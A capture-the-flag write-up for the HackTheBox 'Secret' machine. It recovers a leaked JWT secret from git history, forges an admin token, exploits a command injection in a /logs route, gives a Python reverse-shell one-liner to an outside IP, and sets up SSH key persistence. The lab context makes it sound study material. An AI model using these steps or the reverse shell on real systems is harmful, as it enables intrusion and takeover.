HackTheBox-Secret

https://app.hackthebox.com/machines/408

nmap scan results


The docs directory explains how to call the API, and port 3000 is the API itself; Postman is used to send the API requests.

Note: choose JSON rather than TEXT as the body format.

The JWT returned by the API (header: HS256):

```text
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNiMTcwMjljNmRlNzA0NWNmMzQxNmUiLCJuYW1lIjoibWkzYWthIiwiZW1haWwiOiJtaTNha2FAbWkzYWthLmNvbSIsImlhdCI6MTY0ODAzOTgyOX0.J0uPhnjO3JNsdsPOoNd-gKbgU_d-voRaHp6BlR7Nc04
```

  1. Tried changing the algorithm from HS256 to None; no luck.

  2. Downloaded the source from http://10.10.11.120/download/files.zip and searched it for the symmetric signing key.

```javascript
//routes/auth.js

router.post('/login', async (req, res) => {

  const { error } = loginValidation(req.body)
  if (error) return res.status(400).send(error.details[0].message);

  // check if email is okay
  const user = await User.findOne({ email: req.body.email })
  if (!user) return res.status(400).send('Email is wrong');

  // check password
  const validPass = await bcrypt.compare(req.body.password, user.password)
  if (!validPass) return res.status(400).send('Password is wrong');

  // create jwt: HS256 (jsonwebtoken's default) signed with the symmetric TOKEN_SECRET
  // from .env; no expiresIn is set, so the token carries only iat and never expires
  const token = jwt.sign({ _id: user.id, name: user.name, email: user.email }, process.env.TOKEN_SECRET)
  res.header('auth-token', token).send(token);

})
```
```text
//.env

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret
```

On testing, however, this TOKEN_SECRET is not the one the server actually uses.

Listing the directory reveals a .git directory, so the next step is to recover the git history.

Check with git log:

```text
commit e297a2797a5f62b6011654cf6fb6ccb6712d2d5b (HEAD -> master)
Author: dasithsv <[email protected]>
Date: Thu Sep 9 00:03:27 2021 +0530

now we can view logs from server 😃

commit 67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:30:17 2021 +0530

removed .env for security reasons

commit de0a46b5107a2f4d26e348303e76d85ae4870934
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:29:19 2021 +0530

added /downloads

commit 4e5547295cfe456d8ca7005cb823e1101fd1f9cb
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:27:35 2021 +0530

removed swap

commit 3a367e735ee76569664bf7754eaaade7c735d702
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:26:39 2021 +0530

added downloads

commit 55fe756a29268f9b4e786ae468952ca4a8df1bd8
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:25:52 2021 +0530

first commit
```

git log -p shows the diff each commit introduced; the "removed .env for security reasons" commit contains:

```diff
-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
+TOKEN_SECRET = secret
```
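Review bot: overwriting the value with `secret` in this hunk does not remove the real key from the repository; the value on the `-` line stays in history and is recovered here with a plain `git log -p`. The secret on the `-` line has to be treated as compromised and rotated on the server, `.env` should be purged from history and added to `.gitignore`, and the committed file should carry no real value at all.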

With the recovered secret, a token can be signed whose payload sets name to theadmin:

```text
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNiMTcwMjljNmRlNzA0NWNmMzQxNmUiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im1pM2FrYUBtaTNha2EuY29tIiwiaWF0IjoxNjQ4MDM5ODI5fQ.iXPlMOgNzfMI5PpQrJsb8pxK93FlHDMIDMw4_aiVlRk
```


The /logs route has a command injection:

```javascript
//routes/private.js

router.get('/logs', verifytoken, (req, res) => {
  const file = req.query.file;
  const userinfo = { name: req.user }
  const name = userinfo.name.name;

  if (name == 'theadmin') {
    // the user-controlled ?file= value is interpolated straight into a shell command line
    const getLogs = `git log --oneline ${file}`;
    exec(getLogs, (err, output) => {
      if (err) {
        res.status(500).send(err);
        return
      }
      res.json(output);
    })
  }
  else {
    res.json({
      role: {
        role: "you are normal user",
        desc: userinfo.name.name
      }
    })
  }
})
```

Reverse shell one-liner:

```text
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.16.20",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
```

Adding a public key to .ssh/authorized_keys then allows logging in over SSH.